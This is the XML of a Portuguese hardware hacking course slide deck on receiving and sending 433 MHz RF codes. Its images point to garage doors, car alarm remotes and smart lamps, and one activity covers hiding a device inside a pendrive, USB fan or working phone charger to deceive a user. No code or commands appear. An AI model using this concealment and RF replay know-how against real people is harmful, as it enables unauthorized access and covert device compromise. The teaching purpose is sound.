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308" r:id="rId4"/>
    <p:sldId id="325" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="288" r:id="rId7"/>
    <p:sldId id="327" r:id="rId8"/>
    <p:sldId id="328" r:id="rId9"/>
    <p:sldId id="326" r:id="rId10"/>
    <p:sldId id="324" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="292" r:id="rId14"/>
    <p:sldId id="293" r:id="rId15"/>
    <p:sldId id="294" r:id="rId16"/>
    <p:sldId id="309" r:id="rId17"/>
    <p:sldId id="313" r:id="rId18"/>
    <p:sldId id="312" r:id="rId19"/>
    <p:sldId id="315" r:id="rId20"/>
    <p:sldId id="314" r:id="rId21"/>
    <p:sldId id="319" r:id="rId22"/>
    <p:sldId id="316" r:id="rId23"/>
    <p:sldId id="317" r:id="rId24"/>
    <p:sldId id="318" r:id="rId25"/>
    <p:sldId id="310" r:id="rId26"/>
    <p:sldId id="311" r:id="rId27"/>
    <p:sldId id="300" r:id="rId28"/>
    <p:sldId id="296" r:id="rId29"/>
    <p:sldId id="320" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="321" r:id="rId32"/>
    <p:sldId id="322" r:id="rId33"/>
    <p:sldId id="323" r:id="rId34"/>
    <p:sldId id="304" r:id="rId35"/>
    <p:sldId id="306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505"/>
    <a:srgbClr val="07B0FE"/>
    <a:srgbClr val="D0CECE"/>
    <a:srgbClr val="7F7F7F"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="FFF2CC"/>
    <a:srgbClr val="37CBFF"/>
    <a:srgbClr val="FF5353"/>
    <a:srgbClr val="002060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>
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="-102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FE2EC-7D1E-437A-B3B9-58BCC3089E3B}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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159F-C104-4BBE-811C-F1B4DE953F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73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CCDEA-A9EA-405B-A9D0-855004C6C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EC943D-9561-4852-BE32-108FBB024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127DE2-AC00-4EA5-85AF-70DFF9EC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73AB-74F9-4BCA-BA9C-0E12EC87E13B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A6698-229B-460D-8809-9627C2BB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7899CB-D136-4300-9BD3-D12ECBC1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78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B21AB-F7AA-4FCF-8457-A7AB16F1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56405E-0735-4D69-8062-A3B267FE1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B0965B-0804-4E89-98DA-0DAC32CD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A31A-73FA-4B08-B6BE-666BD985708F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B9A4EF-B157-4620-979F-04B235D6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CADC32-91D8-4F54-A707-0A9BD500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22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A27862-BD12-4AA9-84EF-A5FF2679E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0AA07F-39BA-401D-AC94-667D2061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FE2691-9D7C-420B-90DB-93A6C5B1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C24-E5AE-48C6-85F8-5DCBBA64031F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CD8E7-3831-46E2-93A5-61BCB0A2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321031-9D5D-41E9-894C-26A430A4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22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95784-0C5D-4E70-9C48-686392BB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38671-DE07-4B76-B5A2-0B1BF402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09BAF-7C54-4285-86E6-AE8C9879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65B6-1E83-411A-B198-C590811DA9A2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F203BE-8676-4355-A908-60295759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7AB77F-A5CC-410B-89D5-D5E38C89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22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C305C-3326-4DF4-97E2-32450A26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E74E73-0F5F-4E45-8DC2-5A4BADA84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3B90E-2526-48C6-B4A3-64FAB122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0961F-FF6E-4BF2-8433-B3873EEAA0EE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A1D75E-13DF-49B3-82A0-C3B4F5AA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A3A1A5-7C7D-44AD-AC83-A2827F01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01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1E51B-8C1F-46BC-95F8-569124F2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A3CF61-30F4-4476-ABDD-299453F14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F98669-ACBD-4870-BD5B-3D970A2D7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7BA97-AC75-46CD-B425-CBC0B8DF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51B7B-F238-449B-A155-745B57D6D156}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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45457B-2D28-4BCF-B583-FFED1CC5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5B4126-752F-47E8-88FD-E30634E6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84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14983-DD4E-4533-94D1-B4ACF8F6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15DD10-DD58-42CC-A4BD-2FA8AE4B6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C20388-D409-425C-8676-8B1594E71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2B7C38E-A487-4BD7-B8A6-31A72A698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A9DE43-D915-450B-9883-0C4FBBA18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EDEB232-FC74-486B-AE1C-AF557B26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5D97-4461-4EF2-8657-93E2B3C37D3D}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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73F8F0-2C69-46D2-9CE3-9835E9F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77C20F-662D-4E02-881A-06609479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7729-894C-4B45-BBE2-650C688C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4A1B1C-1395-42C0-AA53-E962E945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6B8A-4FA2-43B8-9BFF-0C4D3A1F33B8}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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A4128E-E819-48C8-A6B9-65FB3C40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A4E143-5F8A-4AB1-91CD-767F2441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585725-9099-49DC-B80D-8A8BBAD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D3EC-63B4-4A05-B599-9AAE7B8646BB}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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D80458-D1F5-44F7-BFFF-66D0173A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0B715B-B67B-4954-895C-293EC7FD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52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FF4C2-7192-44BD-AFC7-BB8EC1AE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4F44A9-C755-4A02-BC73-C393284AB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DF4A7-D935-4718-9206-2ED617F0F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BBBA36-218B-4F2B-BFFE-9BA7468A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5031-75A4-407F-899B-AB777A739042}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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5B2B14-B8E0-4F64-9234-51FF7E06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11D7-0951-4D63-AA44-0B1D25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3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1D51D-CBBC-4D85-8F92-ABFF2FD5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E89AC8-BD13-4EBA-82A0-ABB8D3F3D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EDCBAF-E3E9-40F3-90C7-750A56C30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6B8D7D-D1C8-40CC-937F-039898FE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D580-0C51-4495-8CC1-B947334EDD20}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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4823A3-6A87-4F14-8BD6-EF4D600D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AEB84F-88C9-4C69-91D5-F9DACB1D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82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5990A8-AEC5-49BF-AADB-08688CB1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33EDE0-3EFA-4F06-A333-96444748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83ADDA-12C4-4550-99E9-B33003D99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D73D3-F4E2-43ED-86B1-56D8E7B3C8AF}" type="datetime1">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>12/11/2019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241FB3-43EE-4BDE-A7FC-76C18567D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E4F0B3-5FE9-4A4C-A2CC-5A6CC605C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AB9F-5007-4CEE-ADAC-69865FB11C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65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jpe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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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jpe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hyperlink" Target="https://dontpad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72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7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75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hyperlink" Target="https://www.google.com/search?safe=active&amp;biw=1920&amp;bih=920&amp;tbm=shop&amp;ei=TqnKXY6MEqCu5OUPl8GMkAE&amp;q=rf433&amp;oq=rf433&amp;gs_l=psy-ab-sh.3..0i67k1.1845.1845.0.2093.1.1.0.0.0.0.118.118.0j1.1.0....0...1c.1.64.psy-ab-sh..0.1.118....0.-PlKczNIQqo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78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7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6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5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7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6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54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8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8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81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2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5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4.jpe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3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997286-0C3F-4086-9D56-E65F029267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DCE1A7B1-D498-4559-B8CE-40EA11B18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13010CC-D564-4FF5-A356-7F06DCB7B612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BA283A-5A9F-4FA9-A230-E05CE8A0B299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4813009" y="824318"/>
            <a:ext cx="6894821" cy="67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4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Recebendo e Enviando códigos com  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RF433Mhz</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4000" b="1" dirty="0">
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Módulo 4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E8D3ECE-50B7-4604-B13C-221B7A40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A2ECF32A-B95A-4DEA-BD24-7A77EFE3455D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Engrenagem única">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F739CF-33AD-480B-BA05-750CE2E35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31" name="Gráfico 30" descr="Engrenagens">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A70D8C-B9DB-4600-A1F3-47E50CDAD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33" name="Gráfico 32" descr="Pato de borracha">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20C3F47-CBD4-4B0D-91FE-4341835B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35" name="Gráfico 34" descr="Microfone de rádio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A8D50C-FB89-44CB-B750-7A8008761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37" name="Gráfico 36" descr="Telefone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C42DD50-CB7E-42FC-98DD-AF6EA5DC0F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39" name="Gráfico 38" descr="Chave inglesa">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18FACE9A-BE11-4587-9923-04CC517A6F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41" name="Gráfico 40" descr="Ferramentas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90596D84-9CE6-4F89-A9AE-6403C01ABA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43" name="Gráfico 42" descr="Bateria cheia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8382B077-F998-47CF-A8B7-48D17065C8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45" name="Gráfico 44" descr="Controlador de jogo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E88AC08F-54D3-403F-BA36-93DBC96F7E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47" name="Gráfico 46" descr="Câmera de segurança">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F0A863-35C0-49CD-B13E-4EE15CD936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49" name="Gráfico 48" descr="Desbloquear">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1DF1E3-7FDD-4814-A8B2-7696831EFE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51" name="Gráfico 50" descr="Plugue">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F3DD15-1B35-42F4-BEA4-81CCD3BC0C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53" name="Gráfico 52" descr="USB">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744F5A45-45FF-4898-9D5F-28E0D5D58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55" name="Gráfico 54" descr="Processador">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD905DCF-7055-4FCB-97AE-2B3D1C601F8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57" name="Gráfico 56" descr="Roteador sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA11CA05-43C5-4722-B7A3-B9DA0B4B8C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59" name="Gráfico 58" descr="Controle remoto">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9888ADA9-C619-4B35-BD44-510E2989ECE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61" name="Gráfico 60" descr="Bluetooth">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D797AE56-1627-4E99-9504-F3867B59109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63" name="Gráfico 62" descr="Robô">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842B6465-287B-48CE-90D3-B7B9AAB5B6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65" name="Gráfico 64" descr="Torre de Celular">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D529A88-EFA0-44E6-8099-DEDEA05AF4E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67" name="Gráfico 66" descr="Smartphone">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E8CA4C-1620-424F-9AFC-A2708B662EC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69" name="Gráfico 68" descr="Sem fio">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2168B870-05F7-4006-A2E3-BE41C251DC7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71" name="Gráfico 70" descr="Wi-Fi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2A1EF23-83CA-4059-A2C5-27B8656838E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73" name="Gráfico 72" descr="Carregando">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346EE92B-0F6E-4027-9238-A114BD96788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75" name="Gráfico 74" descr="Voz">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CCE79FB-79A9-4AF1-A6B8-097318526DF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pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Gráfico 76" descr="Carregamento de bateria">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F075C0-55D2-4556-A5C6-2D4BFCF818E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657169" y="126015"/>
            <a:ext cx="188232" cy="188232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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BAB96E57-3C2C-482C-8A14-4AD75C4A4529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1" y="3827335"/>
            <a:ext cx="12191999" cy="1801559"/>
            <a:chOff x="0" y="2877800"/>
            <a:chExt cx="12191999" cy="1801559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DE71373-8692-4FEC-AACE-A05582E10BC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3929681"/>
              <a:ext cx="12191999" cy="6210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2082490A-DC24-402C-BCED-B4C7A64C078D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2925310" y="3642825"/>
              <a:ext cx="69179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rgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ardw  re    ack  ng</a:t>
              </a:r>
              <a:endParaRPr lang="pt-BR" sz="6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87" name="Gráfico 86" descr="Sem fio">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4875D3BB-2ED9-4365-8239-2888B100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 rot="5400000">
              <a:off x="8133326" y="2877800"/>
              <a:ext cx="941408" cy="941408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Gráfico 92" descr="Desbloquear">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D5A8D7-DF0A-4683-9867-480BF2B10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4829685" y="3952400"/>
              <a:ext cx="512133" cy="512133"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="96" name="Gráfico 95" descr="USB">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F1C5A7-0800-4861-8173-72A8F392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208005" y="3473359"/>
              <a:ext cx="1206000" cy="1206000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="98" name="Gráfico 97" descr="Robô">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4096AD9E-F8E5-4183-BDB3-C7E45D97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637743" y="3402461"/>
              <a:ext cx="1205393" cy="1205393"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="99" name="Gráfico 98" descr="Chave inglesa">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234FE975-B43A-4241-A0F5-812FF75A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471729">
              <a:off x="6307348" y="3677895"/>
              <a:ext cx="817064" cy="817064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="100" name="Gráfico 99" descr="Controle remoto">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DBBAE5-E9FB-4719-B4B6-3323122B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51971" y="3714976"/>
              <a:ext cx="785352" cy="785352"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="Gráfico 100" descr="Chave inglesa">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1309A693-7899-4B68-90AA-7E720DA6D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471729">
              <a:off x="2523887" y="3677895"/>
              <a:ext cx="817064" cy="817064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Retângulo 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B2BFE15-46C7-4521-81CA-FB06412B68B5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9D390650-288E-4161-B482-71B5A4E9D259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1030" name="Picture 6" descr="Resultado de imagem para garage door&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B7184F-2912-4367-A2C3-489AE0F98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3" b="5462"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2251503" y="1082182"/>
            <a:ext cx="1426752" cy="1428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car remote&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9889843E-D755-4289-AE55-CE6DBD2ED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r="18079"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5968452" y="1702721"/>
            <a:ext cx="1994399" cy="199710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61456DE-AAB0-4A60-9223-EAB3EFF9C61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1666189" y="2892632"/>
            <a:ext cx="1280437" cy="1280437"/>
            <a:chOff x="2406394" y="3148371"/>
            <a:chExt cx="1280437" cy="1280437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D6F67C8-DF50-4A05-A49B-5D2E562D9B74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2406394" y="3148371"/>
              <a:ext cx="1280437" cy="12804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" name="Picture 2" descr="Resultado de imagem para alarm car remote png&quot;">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DE71DB-03F6-4EEF-B8EB-F7451A7A8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111" y="3211573"/>
              <a:ext cx="1155162" cy="1155162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Resultado de imagem para smart lamp rf&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90DD1790-9818-49CD-A8DB-8B0868F93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9483" r="17223" b="4198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4556569" y="3421891"/>
            <a:ext cx="1407824" cy="140402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9600FC5-F9A0-4076-9E26-2CB438F177B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3607671" y="2122514"/>
            <a:ext cx="503555" cy="27516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E6F90179-A0D4-4F4D-97FE-BEC03869FF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1028" idx="3"/>
            <a:endCxn id="7" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2946626" y="2981033"/>
            <a:ext cx="1340494" cy="55181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AD77F4F7-2DE6-4579-8DAB-977A01C48B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992141" y="3063276"/>
            <a:ext cx="106503" cy="36572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2CCF5606-8ECB-40F6-A1F7-E12F18E941D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="1032" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361689" y="2670521"/>
            <a:ext cx="606763" cy="307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m para rf 433 receiver&quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7380E4-933E-4CB0-8BE0-8C7BC60B0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25" y="1955845"/>
            <a:ext cx="1201083" cy="120108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7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85BD7E9-4017-4AC9-A245-780307B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10</a:t>
            </a:fld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A4314FB4-D7A9-4386-902F-274CEFFA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3" y="184850"/>
            <a:ext cx="4720078" cy="254803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8621C96-D3AD-4758-B5F9-8B8F2F05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51" y="3718832"/>
            <a:ext cx="3017782" cy="160338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D8A070-1705-42A0-B294-0E65CD63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3" y="3718832"/>
            <a:ext cx="2743200" cy="1738020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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DAEA7FC8-1326-4A2D-B408-2BDCB5CC93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5234" y="393860"/>
            <a:ext cx="12700" cy="62228"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 862496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62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B96F32EF-A63F-4A50-AD9C-AEE317251A3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2468880" y="38560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16D053A2-CA70-4446-B5FE-A419B5FD65E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531108" y="38560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47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11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Atividades (Continuação):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09DF02-37A7-4AC2-B080-E7F43B241013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12831" y="3732105"/>
            <a:ext cx="31838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Escondendo o dispositivo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1123A32-0FEF-48AE-829D-3AC38B119311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522228" y="4113838"/>
            <a:ext cx="11390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Conhecendo as várias possibilidades de esconder um dispositivo para enganar um usuário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Disfarçando um Pendrive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Disfarçando um ventilador USB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E qualquer outro dispositivo que utilize a porta USB como fonte de alimentação como Lâmpada de LED, geladeira portátil, carregador de telefone, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r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CEB87-4CB7-4324-BA2B-14673C83B025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="865721" y="1064313"/>
            <a:ext cx="10319208" cy="1631763"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 956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843019C-7157-4FA5-996A-C98FF4C63149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3629024" y="1256987"/>
            <a:ext cx="7789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+mj-lt"/>
              </a:rPr>
              <a:t>Criaremos um carregador de celular funcional para esconder o nosso dispositivo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3FB86C9-E794-4D7C-AEE5-C8DBCBCC79B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3491996" y="1379609"/>
            <a:ext cx="1080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D3AB7FA6-2BB2-40EA-9399-B7294FBCDCE2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16200000">
            <a:off x="1645521" y="650982"/>
